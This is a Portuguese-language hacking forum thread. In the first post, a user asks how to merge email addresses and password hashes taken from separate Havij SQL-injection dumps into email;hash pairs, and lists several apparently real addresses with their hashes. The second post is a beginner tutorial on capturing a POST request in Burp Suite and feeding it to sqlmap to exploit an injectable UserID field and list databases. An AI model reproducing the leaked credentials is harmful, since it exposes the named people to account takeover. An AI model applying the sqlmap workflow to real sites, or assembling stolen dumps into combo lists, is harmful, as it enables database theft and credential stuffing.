Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Colocar a tabela "e-mail" junto com a tabela "senha".

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Colocar a tabela "e-mail" junto com a tabela "senha".

    Primeiramente bom ano novo para todos.

    Agora partindo para a dúvida do tópico. A minha dúvida é o seguinte,estou com um arquivo aqui porém eles estão em .html diferentes. Minha dúvida é como fazer agrupar.

    Exemplo. Um .html do havji estou apenas os e-mail.

    admilson-ferreira@uol.com.br
    rogerbermudespansiere@hotmail.com
    Fernandodipe@hotmail.com
    eduardosbelz@hotmail.com


    E o outro estão apenas as senhas.


    e5aee9a37adee912007750cd1831dd5e
    05166dd4ebb6b98e461066b0e426db90
    b36ed8a07e3cd80ee37138524690eca1
    022b2dfe3021997e17d54ef256aa1d07


    Eu queria de uma forma automática fazer ficar desse jeito

    admilson-ferreira@uol.com.br;e5aee9a37adee912007750cd1831dd5e
    rogerbermudespansiere@hotmail.com;05166dd4ebb6b98e461066b0e426db90
    Fernandodipe@hotmail.com;b36ed8a07e3cd80ee37138524690eca1
    eduardosbelz@hotmail.com;022b2dfe3021997e17d54ef256aa1d07


    Já tentei usar o sublime text porém não consigui fazer,se alguém me ajudar ficarei muito agradecido.


  • Font Size
    #2
    [Tutorial] sqlmap - metodo POST simplificado

    sqlmap
    metodo POST
    Vou vos tentar explicar da maneira mais simplificada e "noob-friendly" consegur uma usar uma vulnerabilidade SQLi no metodo POST.
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Agora que ja têm mais ou menos uma ideia, vamos a isso.
    Usaremos como alvo-exemplo este website que tem uma falha no seu sistema de cadastro, dispondo da seguinta vulnerabilidade:
    Código:
    POST localhost/gamefiles/regist_yes.php
    (...)
    (...)
    UserID=oran&Password=skyfall&RPassword=skyfall&Email=ahaha222%40yopmail.com&UserName=ahahah&Sex=1&IDCard=1111111&Ques=Lieblingszahl%3F&Answ=CONA&Answ1=cONA&art-button=Registrar


    Sendo o paramêtro "UserID" vulneravel a SQL Injection.
    Como verificar isso? Simples, editando o pedido e alterando o valor para UserID=1' obtemos o seguinte erro:
    Código:
    Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in X:\xxx\www\xxx\xxxx\xxx.php on line 14
    Agora vamos ao que interessa!
    Vamos precisar do BurpSuite neste tutorial (google <3)
    E para usar o burpsuite necessitam tambem do Java

    Após fazerem o download de ambos, instalem (o burp n requer instalação) e abram o burp.
    Vamos usa-lo pra interceptar os pedidos entre o site e o usuario com o intuito de obter a POSTDATA necessaria para usar mais tarde juntamente com o SQLmap. O metodo que considero mais simples.

    Como utilizar o BurpSuite
    1 - Abra o burpSuite e mude as definições da sua internet para conectar no proxy do burp, 127.0.0.1:8080.
    2 - Vá a Tab "Proxy" e clique onde diz "Intercept is on", isso o desligará.
    3 - Agora va ao alvo-exemplo e antes de submeter, ligue novamente o Intercept na tab Proxy.
    4 - Receberão isto:
    Código:
    POST /gamefiles/regist_yes.php HTTP/1.1
    Host: localhost
    Proxy-Connection: keep-alive
    Content-Length: 187
    Cache-Control: max-age=0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Origin: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Referer: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.8
    Cookie: kkkkk=4319lcq9tn0pv7e008ls4cdg07
    
    UserID=oran&Password=skyfall&RPassword=skyfall&Email=ahaha222%40yopmail.com&UserName=ahahah&Sex=1&IDCard=1111111&Ques=Lieblingszahl%3F&Answ=CONA&Answ1=cONA&art-button=Registrar
    Copiem isso e guardem num bloco de notas com o nome que quiserem, o meu sera gdh.txt

    Finalmente, ao SQLmap!
    1 - Peguem no arquivo .txt que acabaram de guardar e ponham na pasta "txt" dentro da pasta do sqlmap.
    2 - usaremos o comando -r(Read) que fará exatamente o que diz, ler o pedido.
    e o comando -p para definir o paramêtro:
    Fica assim então:
    Código:
     sqlmap.py -r gdh.txt -p UserID --dbs

    E voilá, so deixar o sqlmap fazer o trabalho dele e dispor as tabelas!


    Bom, é meu primeiro tutorial.. e qualquer duvida deixem ai e tentarei responder rapidamente!
    Espero ter sido claro o suficiente e que vos sirva de alguma utilidade este material!

    Comment

    X
    Working...
    X